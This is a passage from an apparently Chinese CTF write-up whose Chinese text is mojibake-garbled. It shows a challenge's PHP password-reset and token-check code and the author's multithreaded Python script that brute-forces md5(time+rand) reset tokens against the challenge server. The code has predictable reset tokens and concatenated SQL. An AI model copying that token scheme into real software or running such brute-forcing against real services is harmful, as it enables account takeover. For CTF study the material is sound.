//妫鏌ユ湁娌℃湁瓒呰繃30鍒嗛挓
if($Time_check){
$date = time();
$rand=(string)rand(1,10000);
$token = md5($date.$rand);
$updateDate = "UPDATE `XDctf_web_350`.`user` SET `date` =".$date." WHERE `user`.`id` = 0;";
$query = mysql_query($updateDate);
$updateToken = "UPDATE `XDctf_web_350`.`user` SET `token` =".'\''.$token.'\''." WHERE `user`.`id` = 0;";
$query = mysql_query($updateToken);
echo "<script>alert('閲嶇疆瀵嗙爜閾炬帴宸茬粡鍙戦併傛湁鏁堟湡涓30鍒嗛挓銆');</script>";
}
else
echo "<script>alert('閾炬帴杩樻病杩囨湁鏁堟湡锛岃鐧诲綍閭鏌ョ湅銆');</script>";
}
else
echo "<script>alert('绠$悊鍛樼殑閭鏍规湰涓嶆槸杩欎釜銆');</script>";
}
?>

checktoken.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
require('sql.php');
require('secret.php');
if(!empty($_GET['email']) && !empty($_GET['id']) && !empty($_GET['token']))
{
$email = $result->email;
$id = $result->id;
$token = $result->token;
if($id === '0'){
if($_GET['email']===$email){
if($_GET['token']===$token)
echo $flag;
else
echo "token涓嶅銆";
}
else
echo "閭涓嶅銆";
}
else
echo "浣犳兂閲嶇疆涓涓潪鍒涘浜虹殑瀵嗙爜锛屽彲杩欏張鏈変粈涔堢敤鍛紵";
}
else
echo "鍙傛暟涓嶅畬鏁淬";
?>

杩欓噷鏈変釜寰堝偦閫肩殑璁剧疆锛屼竴涓猺ound30鍒嗛挓锛屽彧鏈変竴涓兘鑾峰緱閲嶇疆閭欢鐨勬椂闂存埑锛屽嵆渚挎槸response鐨勬椂闂达紝涔熶細鏈変笂涓嬬殑+-鍑犵殑鏃堕棿宸紝瀵艰嚧涓涓猺ound寰寰瑕佽窇40000銆50000,鑰屽綋鏃舵垜5涓猺ound鎷垮埌3涓紝鏈鍚庢敼鑴氭湰鍒板绾跨▼锛20鍒嗛挓璺戜簡40000閮芥病寰楀埌锛屽悗鏉ユ棤濂堢鑱婂嚭棰樹汉锛屽皢涓涓猺ound鏀逛负10鍒嗛挓锛岀劧鍚1000娆¤姹傦紝鏈鍚庤窇浜6000鎵嶈窇鍒帮紝涔熷氨鏄悊璁轰笂10000鎴戞槸璺戜笉鍒扮殑鈥.璐翠笂鑴氭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import requests
import hashlib
import Queue
import threading
import time
url = "http://web.l-ctf.com:33333/checktoken.php?id=0x00&email=omego952734@xdsec.club&token="
data = 1475406987
words = Queue.Queue()
for j in range(data-1,data+1):
for i in range(1,1000):
m = hashlib.md5()
m.update(str(j)+str(i))
token = m.hexdigest()
urll = url+token
words.put(urll)
print "word suceess"
def brufer(words):
z = 1
while not words.empty():
z+=1
if z == 1000:
print "1000 pass"
z = 0
url = words.get()
s = requests.Session()
try:
r = s.post(url, timeout=4)
except:
print "[!]error:" + url
words.put(url)
continue
if "token" not in r.text:
print "[*]Done" + url
print r.text
exit(0)
#print "[!]pass: " + url
time.sleep(1)
print "something error..."
exit(0)
for i in range(0,59):
t = threading.Thread(target = brufer, args=(words,))
t.start()

鏃犺瘽鍙

misc

鏈夌偣鍎垮啓涓嶅姩浜嗭紝鏈夌┖鍐嶅啓鍚р

CATALOG
  1. 1. WEB
    1. 1.1. web1 Can you get the flag
    2. 1.2. 鎴戞帶鍑犱笉涓绘垜鍙婂嚑鍟
    3. 1.3. 鐫¤繃浜
    4. 1.4. 鑻忔墦瀛﹀鐨勭綉绔
    5. 1.5. Headpic
      1. 1.5.1. 浜屾娉ㄥ叆
      2. 1.5.2. ssrf
    6. 1.6. 浣犱竴瀹氫笉鑳芥潵杩
  2. 2. misc